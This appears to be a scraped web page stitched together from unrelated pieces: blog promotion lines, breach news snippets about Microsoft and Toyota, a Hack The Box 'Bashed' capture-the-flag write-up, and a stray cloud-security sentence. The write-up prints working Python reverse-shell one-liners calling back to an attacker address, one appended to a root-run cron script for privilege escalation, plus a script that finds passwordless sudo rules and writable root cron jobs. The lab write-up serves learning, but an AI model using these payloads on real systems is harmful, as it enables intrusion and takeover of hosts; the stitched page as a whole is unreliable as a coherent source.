Lessons Learned from Recent Cloud Security Failures
Read the full report on -
CyberDudeBivash offers real-time cybersecurity news, threat intelligence, zero-day vulnerabilities, malware reports, and security tools.
How a Single Misconfiguration Caused a Global Data Exposure
Read the full report on -https://cyberbivash.blogspot.com/2025/12/how-single-misconfiguration-caused.html
CyberDudeBivash offers real-time cybersecurity news, threat intelligence, zero-day vulnerabilities, malware reports, and security tools.
Kevin Malone
Microsoft Confirms Data Breach, But Claims Numbers Are Exaggerated
Cloud Security. By Eduard Kovacs on October 20, 2022. Microsoft has confirmed that it inadvertently exposed information related to prospective customers, but claims that the company which reported the incident has exaggerated the numbers. Threat intelligence firm SOCRadar revealed on Wednesday that it has identified…
Toyota Discloses Data Breach Impacting Source Code, Customer Email Addresses
Email Security. By Ionut Arghire on October 11, 2022. Japanese car manufacturer Toyota has disclosed a security incident that involved source code hosted on GitHub and which may have resulted in unauthorized access to roughly 300,000 customer email addresses. The incident, the company says, impacts customers…
Hack The Box: Bashed – Writeup
----------------------------------------------
Reconnaissance
- Open port enumeration
- Directories and files enumeration
Shell upgrade
Privilege Escalation
- Check for misconfigurations
- Inject reverse-shell payload
----------------------------------------------
RECONNAISSANCE
nmap scan. Check for open ports by running an nmap scan. ** Flag choices vary, but I’ve included -O (OS detection), -sV (service version detection), -Pn (skip host discovery, since ICMP ping is often blocked), -sC (default scripts), and -sS (SYN “stealth” scan, which needs root, hence sudo).
INPUT: sudo nmap -sS -sC -sV -O -Pn 10.10.10.68 | tee nmapscan
There is only one open port, port 80. Since port 80 is HTTP, we can open the site in a browser and, beyond the rendered page, read its source for hints such as directory names, script paths or CMS details.
Gobuster. Run a gobuster scan to enumerate web directories and files. ** I’ve run gobuster with the common.txt wordlist (in /usr/share/wordlists/dirb/).
INPUT: gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt | tee gobuster
Only one result returns HTTP 200; the rest are redirects. We immediately notice common directories like “css”, “images” and “fonts”, but the output also tells us that the site uses PHP and has an open “dev” directory for us to view.
We can confirm this on the web page itself: in the blog post, the user “Arrexel” says he has been using phpbash “on this exact server”. Perhaps the phpbash file lives in the “dev” (developer) directory?
Web page
*** Before checking the “dev” directory, I also looked for anything else that might lead to an exploit. Nothing came of it, but the site’s Content Management System (CMS) details and any page that might allow Remote File Inclusion (RFI) or Local File Inclusion (LFI) were worth examining.
Web page - /dev/ We’ve found the “developers” page, and it is unrestricted. This is a serious security misconfiguration: the open phpbash shell gives anyone who can reach the site command execution on the web server. Since Arrexel stated in his blog post that he uses phpbash for pentesting on this very site, we can expect to find further weaknesses once inside.
UPGRADING SHELL
Although we have our initial foothold, the browser-based phpbash shell is limited and buggy: it may freeze or hang, and it offers no tab completion or job control. Let’s upgrade it by launching a reverse-shell payload from the target and catching it with a listener on our attack machine.
*** I initially tried a PHP reverse shell and was unsuccessful; I tried the Python reverse shell next, and that worked.
*** Don’t forget to set the IP address to your attack machine’s VPN address (the interface is usually “tun0” in ifconfig), and start the listener before firing the payload.
(from attacker’s terminal) INPUT: netcat -nlvkp 1234
(from target’s phpbash shell) INPUT: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We’re connected. Next, upgrade to a proper TTY so that interactive programs such as sudo and su behave correctly.
INPUT: python -c 'import pty; pty.spawn("/bin/bash")'
User flag. Now that we have a proper shell, let’s search for the user flag. Looking through /home/arrexel/, we find user.txt and open it to read the flag.
PRIVILEGE ESCALATION
Recon. The last step is escalating to root, but first we need more information about the server. Check for common misconfigurations such as:
- sudo rules that let our user run commands as other users (sudo -l)
- files with the setuid bit set
- running services, scheduled jobs and the kernel version
- user information in /etc/passwd (and /etc/shadow, if it happens to be readable)
INPUT: sudo -l
The output shows that our current user, www-data, can run any command as the user scriptmanager without a password.
Additionally, while walking the filesystem I notice a directory called “scripts” to which the user scriptmanager has read/write/execute permissions. Listing it as www-data returns “permission denied”.
User scriptmanager. To view the scripts directory, switch to scriptmanager using the sudo rule we just found; as scriptmanager we can read and write the directory.
INPUT: sudo -u scriptmanager /bin/bash
Inside the scripts directory is test.py, and its content is interesting: the script opens test.txt and writes to it.
Furthermore, ls -lh on test.txt shows a very recent timestamp, even though nobody is running the script by hand.
If our theory is correct, a cron job running as root executes test.py periodically. Since scriptmanager can write test.py, anything we put in it will run as root.
So we add a second reverse shell to test.py; this time, because cron runs the script as root, our listener will receive a root shell. Start the listener first, then append the payload from inside the scripts directory.
(from attacker’s terminal) INPUT: netcat -nlvkp 4321
(from target’s shell, as scriptmanager, in the scripts directory) INPUT: echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> test.py
And… we are ROOT!
Find root flag. Finally, search for the root flag; it is in /root/root.txt.
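As an added example (not code from the original writeup), the Python script below turns the two findings of this privilege-escalation phase into a repeatable check: it parses `sudo -l` output for run-as rules and flags the passwordless ones, and it scans system-crontab lines for files that a root job executes and that the current user can write, or can replace because the containing directory is writable. The `sudo -l` text, the crontab lines and the test.py it creates in a temporary directory are constructed for the demo and modelled on what the writeup reports; the function names are my own.

```python
#!/usr/bin/env python3
"""Triage for the two misconfigurations the Bashed box turns on.

parse_sudo_l()            -> run-as rules from `sudo -l`, with NOPASSWD flagged
writable_root_cron_jobs() -> files a root cron job runs that we could modify

Added example, not code from the original writeup. The `sudo -l` output,
the crontab lines and the test.py file are constructed for the demo.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# One rule line from `sudo -l`, e.g. "(scriptmanager : scriptmanager) NOPASSWD: ALL"
SUDO_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+?)\s*$")

# Constructed to match the finding in the writeup (www-data -> scriptmanager).
SUDO_L_SAMPLE = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""


def parse_sudo_l(output: str) -> List[Dict]:
    """Return one dict per rule: run-as user, NOPASSWD flag, permitted commands."""
    rules = []
    for line in output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue  # header, Defaults line, or blank
        rules.append({
            # "(user : group)" -> keep only the user part
            "runas_user": m.group("runas").split(":")[0].strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def writable_root_cron_jobs(crontab: str) -> List[Tuple[str, str]]:
    """Scan crontab text in /etc/crontab or /etc/cron.d format (which carries a
    user field) and return (path, reason) for every existing file that a root
    job executes and that we can alter: the file itself is writable, or its
    directory is, so the file can be deleted and replaced."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        # "@reboot user cmd" has 3 fields; "m h dom mon dow user cmd" has 7.
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) not in (3, 7):
            continue
        user, cmd = parts[-2], parts[-1]
        if user != "root":
            continue
        for tok in cmd.split():
            if not tok.startswith("/") or not os.path.isfile(tok):
                continue
            if os.access(tok, os.W_OK):
                hits.append((tok, "file writable"))
            elif os.access(os.path.dirname(tok), os.W_OK):
                hits.append((tok, "directory writable"))
    return hits


def demo() -> Dict:
    """Build a throwaway scripts directory like the one on Bashed and run both checks."""
    with tempfile.TemporaryDirectory() as scripts_dir:
        test_py = os.path.join(scripts_dir, "test.py")
        with open(test_py, "w") as f:
            f.write("f = open('test.txt', 'w')\nf.write('testing 123!')\nf.close()\n")
        # Constructed /etc/crontab; the first job mirrors the one inferred in the writeup.
        crontab = (
            "SHELL=/bin/sh\n"
            "# m h dom mon dow user command\n"
            f"* * * * * root python {test_py}\n"
            "0 3 * * * root /nonexistent/backup.sh\n"
            "* * * * * nobody /nonexistent/cleanup.sh\n"
        )
        cron_hits = [(os.path.basename(p), why) for p, why in writable_root_cron_jobs(crontab)]
    return {"sudo": parse_sudo_l(SUDO_L_SAMPLE), "cron": cron_hits}


if __name__ == "__main__":
    result = demo()
    for rule in result["sudo"]:
        print("sudo: run as %(runas_user)s, NOPASSWD=%(nopasswd)s, cmds=%(commands)s" % rule)
    for path, why in result["cron"]:
        print(f"cron: root runs {path} and it is {why}")
```

On a real target you would feed `parse_sudo_l` the actual `sudo -l` output and `writable_root_cron_jobs` the contents of /etc/crontab and every file under /etc/cron.d; the directory-writable case matters because a script that is root-owned and read-only is still replaceable when its parent directory is writable.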
Cloud computing has been around for more than two decades, yet many businesses still find cloud security a challenge. Two of the major contributors to data breaches are misconfigurations and unchallenged myths about who secures what.